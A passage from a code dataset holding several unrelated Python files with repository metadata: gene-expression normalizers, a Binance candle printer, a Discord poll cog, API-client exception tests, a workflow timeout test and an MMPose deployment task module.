TfidfTransformer\nfrom sklearn.preprocessing import normalize\n\n\nclass PearsonResidualsNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies analytic Pearson residual normalization.\n The residuals are based on a negative binomial offset model with overdispersion\n `theta` shared across genes. By default, residuals are clipped to `sqrt(n_obs)`\n and overdispersion `theta=100` is used.\n\n Adapted from scanpy implementation\n \"\"\"\n\n def __init__(self, theta=100, clip=None):\n assert (theta > 0) # check theta\n assert (clip is None or clip >= 0)\n self.theta = theta\n self.clip = clip\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n scdata = np.array(X, dtype=int) # cast to numpy array\n mask = scdata.sum(axis=0) > 0 # ignore all 0 columns\n X = scdata[:, mask]\n\n # prepare clipping\n if self.clip is None:\n n = X.shape[0]\n clip = np.sqrt(n)\n else:\n clip = self.clip\n\n if issparse(X):\n\n sums_genes = np.sum(X, axis=0)\n sums_cells = np.sum(X, axis=1)\n sum_total = np.sum(sums_genes).squeeze()\n else:\n sums_genes = np.sum(X, axis=0, keepdims=True)\n sums_cells = np.sum(X, axis=1, keepdims=True)\n sum_total = np.sum(sums_genes)\n\n mu = np.array(sums_cells @ sums_genes / sum_total)\n diff = np.array(X - mu)\n residuals = diff / np.sqrt(mu + mu ** 2 / self.theta)\n\n # clip\n scdata[:, mask] = np.clip(residuals, a_min=-clip, a_max=clip)\n return scdata\n\n def fit_transform(self, X, y=None, **fit_params):\n return self.transform(X, y)\n\n\nclass TMMNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies TMM Normalization like in edgeR package.\n\n To compute scale factors a reference sample is choosen as the one nearest to the specified\n percentile of data ( ref_percentile params). GeneWise Logfold change matrix (M) and\n absolute expression level (A) is computed and mean-trimmed according to trim_m and trim_a params.\n\n if seq_depth is set to True a sequencing depth normalization is also done. total numer of reads\n per sample is set as the median of the sequencing depth of the train set.\n\n Based on conorm implementation, but designed to scale with data size ( conorm implementation can't\n handle large datasets )\n \"\"\"\n\n def __init__(self, trim_m=.3, trim_a=.05, ref_percentile=75, seq_depth=True):\n self.trim_m = trim_m\n self.trim_a = trim_a\n self.ref_percentile = ref_percentile\n self.scale_factor = None\n self.total_counts = None\n\n def fit_transform(self, X, y=None, **fit_params):\n self.fit(X, y)\n return self.transform(X, y)\n\n def fit(self, X, y=None):\n self.total_counts = np.median(np.sum(X,axis=1))\n self.scale_factor = self.__compute_scale_factors(X).reshape(-1,1)\n return self\n\n def transform(self, X, y=None):\n X = normalize(X, norm='l1') * self.total_counts\n X /= self.scale_factor\n return X\n\n def __compute_scale_factors(self, readcounts):\n \"\"\"\n compute scale factor\n :param readcounts: expression matrix of shape (n_sample,n_genes)\n :return: ndarray of shape (n_sample,1) with the scale factors of each sample\n \"\"\"\n\n def scale_factor(x, ref):\n \"\"\"\n compute scale factor for a sample\n :param x: sample\n :param ref: reference sample\n :return: scale factor for the sample\n \"\"\"\n vsize = x.shape[0] // 2\n mask = x[vsize:].astype(bool)\n x = x[:vsize]\n\n norm_x = x / np.nansum(x)\n norm_ref = ref / np.nansum(ref)\n log_sample = np.log2(norm_x)\n log_ref = np.log2(ref)\n m = log_sample - log_ref\n a = (log_sample + log_ref) / 2\n\n perc_m = np.nanquantile(m, [self.trim_m, 1 - self.trim_m], method='nearest')\n perc_a = np.nanquantile(a, [self.trim_a, 1 - self.trim_a], method='nearest')\n\n mask |= (m < perc_m[0]) | (m > perc_m[1])\n mask |= (a < perc_a[0]) | (a > perc_a[1])\n\n w = ((1 - norm_x) / x) + ((1 - norm_ref) / ref)\n w = 1 / w\n\n w[mask] = 0\n m[mask] = 0\n w /= w.sum()\n return np.sum(w * m)\n\n readcounts = np.array(readcounts, dtype=float)\n q_expr = np.apply_along_axis(lambda x: np.percentile(x[np.any(x != 0)], self.ref_percentile),\n axis=1, arr=readcounts)\n iref = np.argmin(np.abs(q_expr - q_expr.mean()))\n refsample = readcounts[iref, :]\n\n f = readcounts == 0\n f[:, f[iref]] = True\n readcounts[f] = np.nan\n\n funcin = np.concatenate((readcounts, f), axis=1)\n sf = np.apply_along_axis(lambda x: scale_factor(x, refsample), axis=1, arr=funcin)\n sf -= sf.mean()\n return np.exp2(sf)\n\n\nclass SequencingDepthNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Sequencing depth normalization\n 'total' parameter can be used to set the total number of counts per sample\n in the transformed matrix. default is 1e6, that is equal to a cpm normalization.\n if total is set to 'mean' or 'median', it will be estimated on the train set in the\n fit function.\n a log transformation can also be done if log=True\n \"\"\"\n def __init__(self, total=1e6, log=False):\n self.total = total\n self.log = log\n\n def fit(self, X, y=None):\n if self.total == 'mean':\n self.total = np.sum(X, axis=1).mean()\n elif self.total == 'median':\n self.total = np.median(np.sum(X, axis=1))\n return self\n\n def transform(self, X, y=None):\n X = normalize(X, norm='l1') * self.total\n if self.log:\n return np.log(X + 1)\n return X\n\n def fit_transform(self, X, y=None, **fit_params):\n self.fit(X, y)\n return self.transform(X, y)\n\n\nclass GfIcfNormalizer(TransformerMixin, BaseEstimator):\n \"\"\"\n Applies a gene-frequency inverse-cell-frequency normalization.\n It's basicaly just a wrapper for vanilla sklearn's tfidf transformer\n but output is converted to dense ndarray for easy integration with\n pipelines.\n \"\"\"\n def __init__(self):\n self.tfidf = TfidfTransformer()\n\n def fit(self, X, y=None):\n self.tfidf.fit(X)\n return self\n\n def transform(self, X, y=None):\n return self.tfidf.transform(X).toarray()\n\n def fit_transform(self, X, y=None, **fit_params):\n return self.tfidf.fit_transform(X).toarray()\n","repo_name":"j3rk0/sc-learn","sub_path":"sclearn/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11547393915","text":"#!/usr/bin/env python3\nfrom datetime import datetime\nimport requests\nimport statistics\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n RED = '\\033[31m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass apiCall:\n def __init__(self, arg1, arg2, limit):\n\n url = 'https://api.binance.com/api/v1/klines'\n url2= 'https://api.binance.com/api/v1/exchangeInfo'\n\n params = {\n 'symbol': arg1,\n 'interval': arg2,\n 'limit': limit\n }\n\n response = requests.Session().get(url, params=params)\n\n self.response = response\n self.statusCode = response.status_code\n self.usage1m = response.headers['x-mbx-used-weight-1m']\n self.usage = response.headers['x-mbx-used-weight']\n self.exchange_info = 0 #requests.get(url2).json()\n self.data=response.json()\n\n# This function returns an object of apiCall\ndef api(arg1, arg2, limit):\n return apiCall(arg1, arg2, limit)\n\n\ndef stop_on_api_limit(arg1):\n #test\n # api_call['response'].headers['x-mbx-used-weight']=1200\n if (int(arg1.headers['x-mbx-used-weight'])>1100):\n print('You exceeded \"limit for binance API used-weight\" ')\n exit()\n\ndef output_data(data, limit, r, arg1, arg2, scale):\n oc_red=[]\n oc_green=[]\n for dic in data[-limit:]:\n print(\"\")\n # adjustutc=3600000\n adjustutc=0\n print(datetime.utcfromtimestamp((dic[0]+adjustutc)/1000).strftime('%Y-%m-%d %H:%M %a'),arg2, end=\" | \")\n\n h=round(float(dic[2]),r)\n o=round(float(dic[1]),r)\n c=round(float(dic[4]),r)\n l=round(float(dic[3]),r)\n v=round(float(dic[5])/1,r)\n t=round(int(dic[8])/1 ,r) #number of trades\n\n col_width=1\n\n # OHLC\n # space_print(h, arg1, scale)\n if ( o>c ):\n space_print(o, arg1, scale, r, bcolors.RED )\n # space_print(c, arg1, scale, bcolors.RED)\n else:\n space_print(o, arg1, scale, r )\n # space_print(c, arg1, scale )\n # space_print(l, arg1, scale)\n\n #CALCULATED FILEDS\n\n # #close-open\n # space_print(c-o, arg1, scale)\n # #high-open\n # space_print(h-o, arg1, scale)\n # #high-open\n # space_print(l-o, arg1, scale)\n\n #high-low\n # space_print(round(h-l,r), arg1, scale)\n #sum of c-o\n # oc+=c-o\n # space_print(oc, arg1, scale)\n\n # Candle- body, uptail, downtail\n # uptail\n if c-o<0:\n uptail=o-h\n else:\n uptail=c-h\n #downtail\n if c-o<0:\n downtail=c-l\n else:\n downtail=o-l\n\n space_print(uptail, arg1, scale, r)\n space_print(c-o, arg1, scale, r)\n space_print(downtail, arg1, scale, r)\n\n\n #Median\n if c-o<0:\n oc_red.append(c-o)\n else:\n oc_green.append(c-o)\n\n # #hammers\n # if c-o<0:\n # if abs(c-o)*2abs(c-l) :\n # space_print(10 , arg1, scale)\n # else:\n # if abs(c-o)*20:\n print(\"Avg red candle c-o=\", round((statistics.mean(oc_red)),2), end=\" \" )\n if len(oc_green)>0:\n print(\"Avg green candle c-o=\", round((statistics.mean(oc_green)),2), end=\"\")\n print(\"red/green=\", (len(oc_green)/(len(oc_green)+len(oc_red))) , end = \" \")\n\ndef space_print(x, arg1, scale, r, color=bcolors.OKCYAN):\n\n adjust=10\n # if(o>c):\n #\n if(x<0):\n cs=bcolors.RED\n ce=bcolors.ENDC\n else:\n cs=color\n ce=bcolors.ENDC\n\n if(arg1==\"BTCUSDT\"):\n adjust=7\n x=str(int(x*scale))\n else:\n x=round(x*scale,r)\n x=str(x)\n\n print(cs+x.ljust(adjust,\" \")+ce, end=\"\")\n","repo_name":"Migacz85/dotfiles","sub_path":".scripts/crypto/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16911243212","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nfrom discord import abc\nfrom discord.abc import Messageable\nfrom discord.colour import Colour\n\nclass Community(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self._last_member = None\n\n @commands.command(help= \"Creates a poll which lasts a minute\", aliases=[\"voting\", \"poll\"])\n async def vote(self, ctx, *, arg):\n vote = discord.Embed(title=arg)\n poll = await ctx.send(embed=vote)\n pollid = poll.id\n await poll.add_reaction(\"👍\")\n await poll.add_reaction(\"👎\")\n await asyncio.sleep(60)\n finalpoll = await ctx.fetch_message(id=pollid)\n reacts = finalpoll.reactions\n numyes = 0\n numno = 0\n nummisc = 0\n for react in reacts:\n if react.emoji == \"👍\":\n numyes = react.count - 1\n elif react.emoji == \"👎\":\n numno = react.count - 1\n else:\n nummisc += react.count\n\n await poll.delete()\n rex = \"Results- \"\n if numyes >> numno:\n results = discord.Embed(title=rex + arg, color=0x008000)\n elif numno >> numyes:\n results = discord.Embed(title=rex + arg, color=0xFF0000)\n else:\n results = discord.Embed(title=rex + arg, color=0x0000FF)\n results.add_field(name=\"Yes: \", value=numyes)\n results.add_field(name=\"No: \", value=numno)\n if nummisc != 0:\n results.add_field(name=\"Misc. Reactions\", value=nummisc)\n await ctx.send(embed=results)\n \ndef setup(bot):\n bot.add_cog(Community(bot))","repo_name":"SushiInYourFace/SushiBoi","sub_path":"Discord Bot/cogs/cmty.py","file_name":"cmty.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40467096978","text":"from collections import deque\n\nl = [0,1,2,3,4,5,6,7,8,9]\nl = list(range(10))\nprint('l = %s' % l)\n\n\nq = deque(l,10)\nq.append(11)\nprint(q)\nq.appendleft(12)\nprint(q) \n\nq.pop()\nprint(q)\nq.popleft()\nprint(q)","repo_name":"xusheng2017/python_learning","sub_path":"inline_func/my_deque.py","file_name":"my_deque.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26526336067","text":"from django.conf import settings\nfrom django.test import TestCase\nfrom fakeredis import FakeRedis\nfrom bamboo_engine import states as bamboo_engine_states\n\nfrom gcloud.taskflow3.models import TimeoutNodeConfig\nfrom gcloud.taskflow3.signals.handlers import _node_timeout_info_update\n\n\nclass NodeTimeoutInfoUpdateTestCase(TestCase):\n def setUp(self):\n self.node_id = \"node_id\"\n self.version = \"version\"\n self.redis_inst = FakeRedis()\n self.time_config = TimeoutNodeConfig.objects.create(\n task_id=1, root_pipeline_id=\"root_pipeline_id\", action=\"forced_fail\", node_id=self.node_id, timeout=5\n )\n\n def test__node_timeout_info_update_running_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 1)\n another_version = \"version2\"\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, another_version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 2)\n\n def test__node_timeout_info_update_finish_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n to_state = bamboo_engine_states.FINISHED\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 0)\n\n def test__node_timeout_info_update_fail_state(self):\n to_state = bamboo_engine_states.RUNNING\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n to_state = bamboo_engine_states.FAILED\n _node_timeout_info_update(self.redis_inst, to_state, self.node_id, self.version)\n self.assertEqual(self.redis_inst.zcard(settings.EXECUTING_NODE_POOL), 0)\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/tests/taskflow3/signals/handlers/test__node_timeout_info_update.py","file_name":"test__node_timeout_info_update.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"4258309048","text":"import json\n\nimport pytest\nfrom requests import Response\n\nfrom bigbuy import exceptions as ex\n\n\ndef test_json_or_none():\n assert ex.json_or_none(\"\") is None\n assert ex.json_or_none(\"null\") is None\n\n\ndef test_trim_empty_collections():\n assert not ex._trim_empty_collections({\n 'a': {'b': [{'c': {'d': []}}, {}, []]},\n })\n\n\ndef test_flat_children_errors():\n assert not ex.flat_children_errors({\n 'a': {'children': [{'children': {'b': []}}]},\n })\n\n assert \\\n {'shippingAddress.lastName': ['This value is too long.']} \\\n == \\\n ex.flat_children_errors({\n 'internalReference': [],\n 'cashOnDelivery': [],\n 'language': [],\n 'paymentMethod': [],\n 'shippingAddress': {\n 'children': {\n 'firstName': [],\n 'lastName': {\n 'errors': ['This value is too long.']},\n 'country': [],\n 'postcode': [],\n 'town': [],\n 'comment': [],\n 'vatNumber': [],\n 'companyName': []\n }\n },\n 'carriers': {\n 'children': [\n {\n 'children': {'id': [], 'name': []}\n }\n ]\n }\n })\n\n\n@pytest.fixture()\ndef error_payload():\n return {\n \"code\": 400,\n \"message\": \"ERROR: This value is not valid.\\\\n\",\n \"errors\": {\n \"errors\": [\"This value is not valid.\"],\n \"children\": {\n \"internalReference\": [], \"cashOnDelivery\": [],\n \"language\": [], \"paymentMethod\": [],\n \"shippingAddress\": {\"children\": {\"firstName\": [], \"lastName\": [],\n \"country\": [], \"postcode\": [], \"town\": [],\n \"address\": [], \"phone\": [], \"email\": [], \"comment\": [],\n \"vatNumber\": [],\n \"companyName\": []}},\n \"carriers\": [], \"products\": [], \"dateAdd\": [],\n }\n }\n }\n\n\ndef test_raise_for_response_products_error():\n response = Response()\n response.encoding = \"utf-8\"\n response.status_code = 409\n # Sentry BIXOTO-PZ\n payload = {\n \"code\": 409,\n \"message\": '{\"info\":\"Products error.\",\"data\":[{\"sku\":\"S5001344\",\"message\":\"Inactive product.\"}]}'\n }\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBProductError, match=\"Products error:\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_error_detail():\n warehouses = [\n {\"id\": 1, \"references\": [\"59430878\", \"V0700822\"]},\n {\"id\": 3, \"references\": [\"S7106391\"]}\n ]\n\n response = Response()\n response.encoding = \"utf-8\"\n response.status_code = 409\n payload = {\n \"code\": 409,\n \"message\": \"This cart contains products from different warehouses. You must send separate requests for each set of product references to obtain the shipping costs for each set of products. You can find more info in the field \\\"error_detail\\\" in this response\",\n \"error_detail\": {\"warehouses\": warehouses}\n }\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBWarehouseSplitError) as exc_info:\n ex.raise_for_response(response)\n\n assert isinstance(exc_info.value, ex.BBWarehouseSplitError)\n assert exc_info.value.warehouses == warehouses\n\n\ndef test_raise_for_response_invalid_value_error(error_payload):\n response = Response()\n response.encoding = \"utf-8\"\n response._content = json.dumps(error_payload).encode(\"utf-8\")\n response.status_code = 400\n\n with pytest.raises(ex.BBValidationError):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_too_long_value_error(error_payload):\n response = Response()\n response.encoding = \"utf-8\"\n error_payload[\"message\"] = (\"shippingAddress:\\\\n address:\\\\n ERROR: This value is too long.\"\n \" It should have 70 characters or less.\\\\n\")\n error_payload[\"errors\"][\"children\"][\"shippingAddress\"][\"children\"][\"address\"] = \\\n {\"errors\": [\"This value is too long. It should have 70 characters or less.\"]}\n\n response._content = json.dumps(error_payload).encode(\"utf-8\")\n response.status_code = 400\n\n with pytest.raises(ex.BBValidationError):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_soft_409():\n response = Response()\n response.status_code = 200\n response.encoding = \"utf-8\"\n payload = {'code': 409, 'message': 'Something went wrong 56783360c34fff84fe56880fbf62179b'}\n response._content = json.dumps(payload).encode(\"utf-8\")\n\n with pytest.raises(ex.BBResponseError, match=\"Something went wrong\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_soft_error_headers_in_body():\n \"\"\"\n This test reproduces this real-world error we got on 2022/05/24:\n\n $ curl -iH 'Authorization: Bearer OWZ...Nw' \\\n https://api.bigbuy.eu/rest/shipping/lowest-shipping-costs-by-country/ES\n\n HTTP/2 200\n ...\n content-length: 221\n\n HTTP/1.0 500 Internal Server Error\n Cache-Control: no-cache, private\n Content-Type: application/json\n Date: Tue, 24 May 2022 15:01:07 GMT\n\n {\"error\":\"Information is not available right now. Try it again later\"}\n\n Note how this is a 200 response but whose body contains headers for a 500 error.\n \"\"\"\n\n response = Response()\n response.status_code = 200\n response.encoding = \"utf-8\"\n response._content = (\n 'HTTP/1.0 500 Internal Server Error\\r\\nCache-Control: no-cache, private\\r\\nContent-Type: application/json\\r\\n'\n 'Date: Tue, 24 May 2022 15:41:45 GMT\\r\\n\\r\\n{\"error\":\"Information is not available right now. Try it '\n 'again later\"}'\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=\"not available right now\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_500_html_body():\n response = Response()\n response.status_code = 500\n response.encoding = \"utf-8\"\n response._content = (\n '\\n\\n\\n \\n \\n An Error Occurred: Internal Server Error\\n \\n\\n\\n
...
\\n'\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=\"^
\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_504_html_body():\n response = Response()\n response.status_code = 504\n response.encoding = \"utf-8\"\n response._content = (\n \"

504 Gateway Time-out

\\nThe server didn't respond in time.\\n\"\n ).encode(\"utf-8\")\n\n with pytest.raises(ex.BBTimeoutError, match=r\"^The server didn't respond in time\\.\"):\n ex.raise_for_response(response)\n\n\ndef test_raise_for_response_500_html_body_container_div():\n response = Response()\n response.status_code = 500\n response.encoding = \"utf-8\"\n response._content = \"\"\"\n

Oops! An Error Occurred

\n

The server returned a \"500 Internal Server Error\".

\n

\n Something is broken. Please let us know what you were doing when this error occurred.\n We will fix it as soon as possible. Sorry for any inconvenience caused.\n

\n
\n \"\"\".encode(\"utf-8\")\n\n with pytest.raises(ex.BBServerError, match=r\"^Something is broken\\.\"):\n ex.raise_for_response(response)","repo_name":"Bixoto/PyBigBuy","sub_path":"tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":8165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13920589921","text":"import copy\nimport os\nfrom collections import defaultdict\nfrom typing import Callable, Dict, Optional, Sequence, Tuple, Union\n\nimport mmcv\nimport mmengine\nimport numpy as np\nimport torch\nfrom mmengine.model import BaseDataPreprocessor\nfrom mmengine.registry import Registry\n\nfrom mmdeploy.codebase.base import CODEBASE, BaseTask, MMCodebase\nfrom mmdeploy.utils import (Codebase, Task, get_codebase_config,\n get_input_shape, get_root_logger)\n\n\ndef process_model_config(\n model_cfg: mmengine.Config,\n imgs: Union[Sequence[str], Sequence[np.ndarray]],\n input_shape: Optional[Sequence[int]] = None,\n):\n \"\"\"Process the model config for sdk model.\n\n Args:\n model_cfg (mmengine.Config): The model config.\n imgs (Sequence[str] | Sequence[np.ndarray]): Input image(s), accepted\n data type are List[str], List[np.ndarray].\n input_shape (list[int]): A list of two integer in (width, height)\n format specifying input shape. Default: None.\n\n Returns:\n mmengine.Config: the model config after processing.\n \"\"\"\n cfg = copy.deepcopy(model_cfg)\n test_pipeline = cfg.test_dataloader.dataset.pipeline\n data_preprocessor = cfg.model.data_preprocessor\n codec = cfg.codec\n if isinstance(codec, list):\n codec = codec[-1]\n input_size = codec['input_size'] if input_shape is None else input_shape\n test_pipeline[0] = dict(type='LoadImageFromFile')\n for i in reversed(range(len(test_pipeline))):\n trans = test_pipeline[i]\n if trans['type'] == 'PackPoseInputs':\n test_pipeline.pop(i)\n elif trans['type'] == 'GetBBoxCenterScale':\n trans['type'] = 'TopDownGetBboxCenterScale'\n trans['padding'] = 1.25 # default argument\n trans['image_size'] = input_size\n elif trans['type'] == 'TopdownAffine':\n trans['type'] = 'TopDownAffine'\n trans['image_size'] = input_size\n trans.pop('input_size')\n\n test_pipeline.append(\n dict(\n type='Normalize',\n mean=data_preprocessor.mean,\n std=data_preprocessor.std,\n to_rgb=data_preprocessor.get('bgr_to_rgb', False)))\n test_pipeline.append(dict(type='ImageToTensor', keys=['img']))\n test_pipeline.append(\n dict(\n type='Collect',\n keys=['img'],\n meta_keys=[\n 'img_shape', 'pad_shape', 'ori_shape', 'img_norm_cfg',\n 'scale_factor', 'bbox_score', 'center', 'scale'\n ]))\n\n cfg.test_dataloader.dataset.pipeline = test_pipeline\n return cfg\n\n\ndef _get_dataset_metainfo(model_cfg: mmengine.Config):\n \"\"\"Get metainfo of dataset.\n\n Args:\n model_cfg Config: Input model Config object.\n Returns:\n (list[str], list[np.ndarray]): Class names and palette\n \"\"\"\n from mmpose import datasets # noqa\n from mmpose.registry import DATASETS\n\n module_dict = DATASETS.module_dict\n\n for dataloader_name in [\n 'test_dataloader', 'val_dataloader', 'train_dataloader'\n ]:\n if dataloader_name not in model_cfg:\n continue\n dataloader_cfg = model_cfg[dataloader_name]\n dataset_cfg = dataloader_cfg.dataset\n dataset_mmpose = module_dict.get(dataset_cfg.type, None)\n if dataset_mmpose is None:\n continue\n if hasattr(dataset_mmpose, '_load_metainfo') and isinstance(\n dataset_mmpose._load_metainfo, Callable):\n meta = dataset_mmpose._load_metainfo(\n dataset_cfg.get('metainfo', None))\n if meta is not None:\n return meta\n if hasattr(dataset_mmpose, 'METAINFO'):\n return dataset_mmpose.METAINFO\n\n return None\n\n\nMMPOSE_TASK = Registry('mmpose_tasks')\n\n\n@CODEBASE.register_module(Codebase.MMPOSE.value)\nclass MMPose(MMCodebase):\n \"\"\"mmpose codebase class.\"\"\"\n task_registry = MMPOSE_TASK\n\n @classmethod\n def register_deploy_modules(cls):\n \"\"\"register rewritings.\"\"\"\n import mmdeploy.codebase.mmdet.models\n import mmdeploy.codebase.mmdet.ops\n import mmdeploy.codebase.mmdet.structures\n import mmdeploy.codebase.mmpose.models # noqa: F401\n\n @classmethod\n def register_all_modules(cls):\n \"\"\"register all modules from mmpose.\"\"\"\n from mmpose.utils.setup_env import register_all_modules\n\n cls.register_deploy_modules()\n register_all_modules(True)\n\n\n@MMPOSE_TASK.register_module(Task.POSE_DETECTION.value)\nclass PoseDetection(BaseTask):\n \"\"\"Pose detection task class.\n\n Args:\n model_cfg (mmengine.Config): Original PyTorch model config file.\n deploy_cfg (mmengine.Config): Deployment config file or loaded Config\n object.\n device (str): A string represents device type.\n \"\"\"\n\n def __init__(self, model_cfg: mmengine.Config, deploy_cfg: mmengine.Config,\n device: str):\n super().__init__(model_cfg, deploy_cfg, device)\n self.model_cfg.model.test_cfg['flip_test'] = False\n\n def build_backend_model(\n self,\n model_files: Sequence[str] = None,\n data_preprocessor_updater: Optional[Callable] = None,\n **kwargs) -> torch.nn.Module:\n \"\"\"build backend model.\n\n Args:\n model_files (Sequence[str]): Input model files. Default is None.\n data_preprocessor_updater (Callable | None): A function to update\n the data_preprocessor. Defaults to None.\n\n Returns:\n nn.Module: An initialized backend model.\n \"\"\"\n from .pose_detection_model import build_pose_detection_model\n data_preprocessor = self.model_cfg.model.data_preprocessor\n if data_preprocessor_updater is not None:\n data_preprocessor = data_preprocessor_updater(data_preprocessor)\n model = build_pose_detection_model(\n model_files,\n self.model_cfg,\n self.deploy_cfg,\n device=self.device,\n data_preprocessor=data_preprocessor,\n **kwargs)\n return model.eval().to(self.device)\n\n def create_input(self,\n imgs: Union[str, np.ndarray, Sequence],\n input_shape: Sequence[int] = None,\n data_preprocessor: Optional[BaseDataPreprocessor] = None,\n **kwargs) -> Tuple[Dict, torch.Tensor]:\n \"\"\"Create input for pose detection.\n\n Args:\n imgs (Any): Input image(s), accepted data type are ``str``,\n ``np.ndarray``.\n input_shape (list[int]): A list of two integer in (width, height)\n format specifying input shape. Defaults to ``None``.\n data_preprocessor (BaseDataPreprocessor | None): Input data pre-\n processor. Default is ``None``.\n\n Returns:\n tuple: (data, inputs), meta information for the input image\n and input.\n \"\"\"\n from mmcv.transforms import Compose\n from mmpose.registry import TRANSFORMS\n cfg = self.model_cfg\n if isinstance(imgs, (list, tuple)):\n if not isinstance(imgs[0], (np.ndarray, str)):\n raise AssertionError('imgs must be strings or numpy arrays')\n elif isinstance(imgs, (np.ndarray, str)):\n imgs = [imgs]\n img_path = [imgs]\n else:\n raise AssertionError('imgs must be strings or numpy arrays')\n if isinstance(imgs, (list, tuple)) and isinstance(imgs[0], str):\n img_path = imgs\n img_data = [mmcv.imread(img) for img in imgs]\n imgs = img_data\n person_results = []\n bboxes = []\n for img in imgs:\n height, width = img.shape[:2]\n # create dummy person results\n person_results.append([{'bbox': np.array([0, 0, width, height])}])\n bboxes.append(\n np.array([box['bbox'] for box in person_results[-1]]))\n # build the data pipeline\n test_pipeline = [\n TRANSFORMS.build(c) for c in cfg.test_dataloader.dataset.pipeline\n ]\n test_pipeline = Compose(test_pipeline)\n if input_shape is not None and hasattr(cfg, 'codec'):\n if isinstance(cfg.codec, dict):\n codec = cfg.codec\n elif isinstance(cfg.codec, list):\n codec = cfg.codec[0]\n else:\n raise TypeError(f'Unsupported type {type(cfg.codec)}')\n input_size = codec['input_size']\n if tuple(input_shape) != tuple(input_size):\n logger = get_root_logger()\n logger.warning(f'Input shape from deploy config is not '\n f'same as input_size in model config:'\n f'{input_shape} vs {input_size}')\n\n batch_data = defaultdict(list)\n meta_data = _get_dataset_metainfo(self.model_cfg)\n assert len(imgs) == len(bboxes) == len(person_results)\n for i in range(len(imgs)):\n for bbox in bboxes[i]:\n # prepare data\n bbox_score = np.array([bbox[4] if len(bbox) == 5 else 1\n ]) # shape (1,)\n data = {\n 'img':\n imgs[i],\n 'bbox_score':\n bbox_score,\n 'bbox': [] if hasattr(cfg.model, 'bbox_head')\n and cfg.model.bbox_head.type == 'YOLOXPoseHead' else\n bbox[None],\n 'img_path':\n img_path[i]\n }\n data.update(meta_data)\n data = test_pipeline(data)\n data['inputs'] = data['inputs'].to(self.device)\n batch_data['inputs'].append(data['inputs'])\n batch_data['data_samples'].append(data['data_samples'])\n\n if data_preprocessor is not None:\n batch_data = data_preprocessor(batch_data, False)\n input_tensor = batch_data['inputs']\n return batch_data, input_tensor\n\n def visualize(self,\n image: Union[str, np.ndarray],\n result: list,\n output_file: str,\n window_name: str,\n show_result: bool = False,\n **kwargs):\n \"\"\"Visualize predictions of a model.\n\n Args:\n image (str | np.ndarray): Input image to draw predictions on.\n result (list): A list of predictions.\n output_file (str): Output file to save drawn image.\n window_name (str): The name of visualization window. Defaults to\n an empty string.\n show_result (bool): Whether to show result in windows, defaults\n to `False`.\n \"\"\"\n from mmpose.apis.inference import dataset_meta_from_config\n from mmpose.visualization import PoseLocalVisualizer\n\n save_dir, filename = os.path.split(output_file)\n name = os.path.splitext(filename)[0]\n dataset_meta = dataset_meta_from_config(\n self.model_cfg, dataset_mode='test')\n visualizer = PoseLocalVisualizer(name=name, save_dir=save_dir)\n visualizer.set_dataset_meta(dataset_meta)\n\n if isinstance(image, str):\n image = mmcv.imread(image, channel_order='rgb')\n draw_bbox = result.pred_instances.bboxes is not None\n if draw_bbox and isinstance(result.pred_instances.bboxes,\n torch.Tensor):\n result.pred_instances.bboxes = result.pred_instances.bboxes.cpu(\n ).numpy()\n visualizer.add_datasample(\n name,\n image,\n data_sample=result,\n draw_gt=False,\n draw_bbox=draw_bbox,\n show=show_result,\n out_file=output_file)\n\n def get_model_name(self, *args, **kwargs) -> str:\n \"\"\"Get the model name.\n\n Return:\n str: the name of the model.\n \"\"\"\n assert 'type' in self.model_cfg.model, 'model config contains no type'\n name = self.model_cfg.model.type.lower()\n return name\n\n @staticmethod\n def get_partition_cfg(partition_type: str, **kwargs) -> Dict:\n \"\"\"Get a certain partition config for 